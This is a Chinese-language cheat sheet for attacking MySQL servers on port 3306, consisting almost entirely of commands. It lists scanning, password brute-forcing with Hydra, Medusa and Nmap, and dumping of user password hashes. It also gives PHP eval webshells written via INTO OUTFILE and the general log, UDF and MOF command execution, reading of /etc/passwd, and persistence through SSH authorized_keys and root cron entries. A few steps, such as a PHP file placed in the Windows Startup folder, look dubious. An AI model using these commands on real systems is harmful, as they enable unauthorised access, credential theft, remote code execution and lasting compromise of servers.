3306 - MySQL 渗透

# Nmap 扫描
nmap -sV -p 3306 <TARGET_IP>

# MySQL 枚举脚本
nmap --script mysql-*,mysql-info <TARGET_IP>

# Nmap 脚本
nmap --script mysql-info <TARGET_IP>

# 直接连接
mysql -h <TARGET_IP> -u root -p

# Hydra 爆破
hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://<TARGET_IP>

# Medusa 爆破
medusa -h <TARGET_IP> -U users.txt -P passwords.txt -M mysql

# Nmap 脚本爆破
nmap --script mysql-brute <TARGET_IP>

# 直接连接（无密码）
mysql -h <TARGET_IP> -u root

# 如果成功，查看数据库
show databases;
use mysql;
select user, host, authentication_string from user;

-- 检查文件写入权限
show variables like 'secure_file_priv';

-- 如果为空或指定目录，可以写入
SELECT "<?php @eval($_POST['cmd']);?>" INTO OUTFILE '/var/www/html/shell.php';

-- Windows 路径
SELECT "<?php @eval($_POST['cmd']);?>" INTO OUTFILE 'C:/xampp/htdocs/shell.php';

-- 开启日志
set global general_log = on;
set global general_log_file = '/var/www/html/shell.php';

-- 写入 webshell
SELECT "<?php @eval($_POST['cmd']);?>";

-- 检查 UDF 支持
show variables like 'plugin_dir';

-- 上传 UDF 文件
SELECT load_file('/tmp/lib_mysqludf_sys.so') INTO DUMPFILE '/usr/lib/mysql/plugin/udf.so';

-- 创建函数
CREATE FUNCTION sys_exec RETURNS int SONAME 'udf.so';

-- 执行命令
SELECT sys_exec('whoami');

-- 上传恶意 MOF 文件
SELECT load_file('C:/Windows/System32/mof/nullevt.mof') INTO DUMPFILE 'C:/Windows/System32/wbem/mof/system/nullevt.mof';

-- 写入启动项
SELECT "<?php system($_GET['cmd']);?>" INTO OUTFILE 'C:/ProgramData/Microsoft/Windows/Start Menu/Programs/Startup/shell.php';

-- 查看所有数据库
show databases;

-- 查看用户表
use mysql;
select user, host, authentication_string from user;

-- 查看权限
show grants for 'root'@'localhost';

-- 读取敏感文件
SELECT load_file('/etc/passwd');
SELECT load_file('C:/Windows/System32/drivers/etc/hosts');

-- 写入 SSH 公钥
SELECT 'ssh-rsa AAAA...' INTO OUTFILE '/root/.ssh/authorized_keys';

-- 写入定时任务
SELECT '* * * * * /tmp/back.sh' INTO OUTFILE '/var/spool/cron/root';